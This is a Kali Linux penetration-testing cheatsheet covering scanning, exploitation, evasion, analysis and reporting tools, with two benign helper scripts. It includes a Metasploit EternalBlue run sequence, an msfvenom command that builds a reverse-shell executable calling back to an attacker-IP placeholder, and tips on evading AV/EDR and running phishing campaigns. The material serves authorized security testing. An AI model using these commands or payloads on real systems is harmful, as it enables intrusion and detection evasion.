Kali Linux: The Penetration Testing Toolkit Cheatsheet

🛠 Security Tool Cheatsheet

Alex Morgan — Senior Penetration Tester

What is Kali Linux?

Kali Linux is a Debian-based, rolling-release distribution maintained by OffSec and aimed at penetration testing and security auditing. It ships with several hundred security tools pre-installed and is the de facto standard toolkit for professional testers.

Installation

To install Kali Linux, download the ISO from the official website (kali.org), then follow the installation guide for your platform, whether bare metal or a virtual machine. Before booting the image, verify its SHA-256 checksum against the SHA256SUMS file published next to it and check that file's detached GPG signature (SHA256SUMS.gpg) against Kali's archive signing key: a tampered or corrupted toolkit image undermines every result produced from it.
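The checksum step above as a small script. This is an added example, not code from the page or from the Kali project; the image file and SHA256SUMS it creates are constructed stand-ins so it runs offline, and the function name verify_iso is this example's own. With a real download, fetch SHA256SUMS and SHA256SUMS.gpg from the same mirror as the ISO and also run gpg --verify SHA256SUMS.gpg SHA256SUMS after importing Kali's archive key.

```sh
#!/bin/sh
# Added example (not from the original page): check a downloaded Kali ISO
# against the SHA256SUMS file published alongside it before installing.
# The image and checksum file below are constructed stand-ins so the script
# runs offline; the signature check (gpg --verify SHA256SUMS.gpg SHA256SUMS)
# is a separate step not performed here.
set -eu

# verify_iso ISO SUMS -> 0 if ISO's SHA-256 matches its SUMS entry,
#                        1 on mismatch, 2 if SUMS has no entry for it.
verify_iso() {
  iso=$1; sums=$2
  name=$(basename "$iso")
  # SHA256SUMS lists every image variant as "<hash>  <filename>"; take ours only.
  expected=$(awk -v n="$name" '$2 == n { print $1 }' "$sums")
  if [ -z "$expected" ]; then
    echo "no entry for $name in $sums" >&2
    return 2
  fi
  actual=$(sha256sum "$iso" | awk '{ print $1 }')
  if [ "$actual" = "$expected" ]; then
    echo "OK: $name"
    return 0
  fi
  echo "MISMATCH: $name" >&2
  echo "  expected $expected" >&2
  echo "  actual   $actual" >&2
  return 1
}

# Stand-alone demo with a constructed image (not a real Kali ISO).
work=$(mktemp -d)
printf 'placeholder image contents\n' > "$work/kali-linux-example-amd64.iso"
( cd "$work" && sha256sum kali-linux-example-amd64.iso > SHA256SUMS )
verify_iso "$work/kali-linux-example-amd64.iso" "$work/SHA256SUMS"
# A single appended byte must be caught.
printf 'x' >> "$work/kali-linux-example-amd64.iso"
verify_iso "$work/kali-linux-example-amd64.iso" "$work/SHA256SUMS" \
  || echo "tampered image rejected (status $?)"
rm -rf "$work"
```

The function matches on the file name rather than running sha256sum -c over the whole SHA256SUMS file, so a mirror that lists other image variants you did not download does not produce noise, and the three distinct exit codes let a wrapper script tell "wrong hash" from "unknown file".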

Basic Syntax

Most Kali tools are ordinary command-line programs, so their syntax follows the usual pattern of a command followed by options and values; each tool's --help output or man page lists the full option set:

kali_tool --option value

Discovery

Discovery tools help in mapping out the environment and identifying active systems.

Nmap

One of the most popular network scanning tools is Nmap. SYN scans and OS detection need raw-socket privileges, so run them with sudo (Kali's default user is not root).

Flag  Description
-sS   TCP SYN scan ("half-open": never completes the handshake; requires root)
-p    Port(s) to scan, e.g. -p 22,80,443 or -p 1-65535 (-p- is shorthand for all ports)
-O    OS detection by TCP/IP stack fingerprinting (requires root)
-sV   Probe open ports for service and version banners
-oA   Write normal, XML and greppable output to <basename>.nmap, .xml and .gnmap

sudo nmap -sS -p 1-65535 -O -sV -oA scan <target>

Scanning

Scanning tools allow you to uncover vulnerabilities.

OpenVAS

OpenVAS is an open-source vulnerability scanner. On current Kali releases it is packaged as Greenbone Vulnerability Management (GVM), and the old openvas-setup / openvas-start commands have been replaced by their gvm- equivalents. The initial setup downloads the full vulnerability feed, which takes a while; gvm-check-setup reports whether the install is complete.

gvm-setup
gvm-check-setup
gvm-start

Exploitation

Tools for exploiting identified vulnerabilities.

Metasploit

Metasploit is the most widely used exploitation framework. The session below loads the EternalBlue (MS17-010) module; before running it, confirm that the host is actually vulnerable with the auxiliary/scanner/smb/smb_ms17_010 check module, because a failed attempt can crash the target.

msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <target>
run

Analysis

Tools for analysing captured traffic and other artifacts gathered during and after exploitation.

Wireshark

Wireshark is a powerful network protocol analyzer with a graphical interface. Its command-line counterpart, tshark, ships with it and is the better choice for headless capture on a remote box or inside a script; capturing on an interface needs root (or membership of the wireshark group on Kali).

wireshark

Evasion

Tools designed to help escape detection during testing.

Obfuscation Tools

Use tools like Veil or msfvenom to generate and wrap payloads. Bear in mind that unmodified msfvenom payloads and its built-in encoders (such as x86/shikata_ga_nai) are signatured by essentially every current AV and EDR product, so msfvenom is the payload generator, not the evasion layer; that is what Veil and custom loaders are for.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker-ip> LPORT=<port> -f exe -o shell.exe

Reporting

Tools to generate reports on findings.

Dradis

Dradis is used for reporting and knowledge sharing.

dradis

Quick Reference Table

Tool         Use
Nmap         Network discovery and port scanning
OpenVAS/GVM  Vulnerability assessment
Metasploit   Exploitation framework
msfvenom     Payload generation (part of Metasploit)
Veil         Payload obfuscation
Wireshark    Network protocol analysis
Nikto        Web server scanning
SET          Social-engineering and phishing campaigns
Dradis       Reporting and collaboration

Pro Tips

  • Automation: Wrap repetitive steps in scripts, and prefer machine-readable tool output (Nmap's XML or greppable formats, for instance) over screen-scraping.
  • Updating: Kali is a rolling release; keep the whole system current through apt (a full-upgrade, not just upgrade) rather than updating tools one by one. Metasploit modules arrive through the same packages.
  • Customization: Tailor scan timing, port ranges and scripts to the target; a full-port SYN scan with OS detection is noisy, and a fragile production host may need a slower, narrower scan.
  • Logging: Log every session: keep each tool's native output files and capture the terminal with timestamps, so findings can be reproduced and the evidence survives the engagement.
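The automation and logging tips above come together in a small wrapper that runs any tool under a timestamped session log. This is an added example, not code from the page or from Kali; the wrapper name logged, the session-logs directory, the LAST_LOG variable and the header format are this example's own choices, and the commands it runs in the demo are stand-ins for a real tool invocation.

```sh
#!/bin/sh
# Added example (not from the original page): run any tool under a timestamped
# session log so the exact command line, its output and its exit status are
# kept as evidence. Wrapper name, log directory and header format are this
# example's own choices, not a Kali convention.
set -eu

LOGDIR=${LOGDIR:-./session-logs}   # override with LOGDIR=/path before calling
LAST_LOG=""                         # path of the most recent log, for the caller

# logged CMD [ARGS...] -> runs CMD, shows its output live, tees it to a log
# file, and returns CMD's own exit status.
logged() {
  mkdir -p "$LOGDIR"
  stamp=$(date -u +%Y%m%dT%H%M%SZ)
  logfile="$LOGDIR/$stamp-$$-$(basename "$1").log"   # $$ avoids same-second clashes
  statusfile=$(mktemp)
  {
    printf '# started: %s\n# cmd:' "$stamp"
    for a in "$@"; do printf ' %s' "$a"; done       # unquoted record of the argv
    printf '\n'
  } > "$logfile"
  # The && / || pair captures the status without tripping set -e, and the
  # status goes through a file because a pipeline only reports tee's status.
  { "$@" 2>&1 && s=0 || s=$?; echo "$s" > "$statusfile"; } | tee -a "$logfile"
  s=$(cat "$statusfile"); rm -f "$statusfile"
  printf '# exit: %s\n' "$s" >> "$logfile"
  LAST_LOG=$logfile
  return "$s"
}

# Stand-alone demo: a command that succeeds and one that fails.
logged printf 'demo run on %s\n' "$(uname -s)"
echo "log written to $LAST_LOG"
logged sh -c 'echo something went wrong >&2; exit 3' \
  || echo "recorded failing exit status $?"
```

Replace the demo commands with real ones, e.g. logged sudo nmap -sS -p- -oA scan <target>; the tool's own output files and the session log then sit side by side, and because the wrapper returns the tool's exit status a calling script can still branch on failure.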

Real-World Examples

A few quick scenarios:

  • Scanning a web server for dangerous default files, outdated software and misconfigurations:
    nikto -h http://target-ip
  • Building a phishing campaign during an authorized social-engineering engagement (setoolkit opens the Social-Engineer Toolkit menu):
    setoolkit
